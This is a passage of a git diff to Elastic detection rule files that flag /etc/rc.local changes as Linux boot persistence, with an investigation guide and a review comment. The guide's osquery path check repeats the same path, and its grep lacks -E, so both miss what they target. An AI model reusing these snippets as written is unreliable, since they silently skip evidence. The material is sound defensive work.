Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. 
\n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type : \"linux\" and event.category : \"file\" and \nevent.type : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and\nfile.path : \"/etc/rc.local\" and not process.name : (\"dockerd\" or \"yum\" or \"rpm\" or \"dpkg\") and not file.extension : (\"swp\" or \"swx\")\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", 
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_106.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_106.json
index 5702a63834d..4ebfff49bdc 100644
--- a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_106.json
@@ -17,7 +17,7 @@ "host.id", "process.executable" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. 
\n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "host.os.type : \"linux\" and event.category : \"file\" and \nevent.type : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and\nfile.path : \"/etc/rc.local\" and not process.name : (\"dockerd\" or \"docker\" or \"dnf\" or \"yum\" or \"rpm\" or \"dpkg\") and not file.extension : (\"swp\" or \"swx\")\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", 
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_107.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_107.json
index 6db10452079..0e0d8cb827c 100644
--- a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_107.json
@@ -18,7 +18,7 @@ "process.executable", "user.id" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. 
\n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate whether the `/lib/systemd/system/rc-local.service` and `/run/systemd/generator/multi-user.target.wants/rc-local.service` files were created through the `systemd-rc-local-generator` located at `/usr/lib/systemd/system-generators/systemd-rc-local-generator`.\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (path = '/run/systemd/generator/multi-user.target.wants/rc-local.service' OR path = '/run/systemd/generator/multi-user.target.wants/rc-local.service')\"}}\n - In case the file is not present here, `sudo systemctl status rc-local` can be executed to find the location of the rc-local unit file.\n - If `rc-local.service` is found, manual investigation is required to check for the rc script execution. Systemd will generate syslogs in case of the execution of the rc-local service. `sudo cat /var/log/syslog | grep \"rc-local.service|/etc/rc.local Compatibility\"` can be executed to check for the execution of the service.\n - If logs are found, it's likely that the contents of the `rc.local` file have been executed. Analyze the logs. In case several syslog log files are available, use a wildcard to search through all of the available logs.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses `rc.local` for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the `service/rc.local` files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type : \"linux\" and event.category : \"file\" and \nevent.type : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and\nfile.path : \"/etc/rc.local\" and not process.name : (\n \"dockerd\" or \"docker\" or \"dnf\" or \"dnf-automatic\" or \"yum\" or \"rpm\" or \"dpkg\"\n) and not file.extension : (\"swp\" or \"swpx\")\n", "references": [ "https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/", 
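Review bot: The `Osquery - Retrieve rc-local.service File Information` query in the new `note` string compares `path` against the same `/run/systemd/generator/multi-user.target.wants/rc-local.service` value on both sides of the `OR`, so the `/lib/systemd/system/rc-local.service` location the preceding bullet tells the analyst to check is never queried; the second operand presumably should be `path = '/lib/systemd/system/rc-local.service'`. In the same guide, `grep "rc-local.service|/etc/rc.local Compatibility"` runs without `-E`, so `|` is a literal character in basic regex and the command matches neither string; `grep -E "rc-local.service|/etc/rc.local Compatibility" /var/log/syslog*` would match either and also covers the rotated logs the next bullet mentions. Both issues are carried over unchanged from the old side of this hunk (only the `\u003e` escapes became `>`) and appear identically in the `0f4d35e4-925e-4959-ab24-911be207ee6f_108.json` hunk below; `benign matter` in the same paragraph should also read `benign manner`.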
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_108.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_108.json
index 3616c131056..abe6d2a844e 100644
--- a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_108.json
@@ -18,7 +18,7 @@ "process.executable", "user.id" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through Run Control Detected\n\nThe `rc.local` file executes custom commands or scripts during system startup on Linux systems. `rc.local` has been deprecated in favor of the use of `systemd services`, and more recent Unix distributions no longer leverage this method of on-boot script execution. \n\nThere might still be users that use `rc.local` in a benign matter, so investigation to see whether the file is malicious is vital. \n\nDetection alerts from this rule indicate the creation of a new `/etc/rc.local` file. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
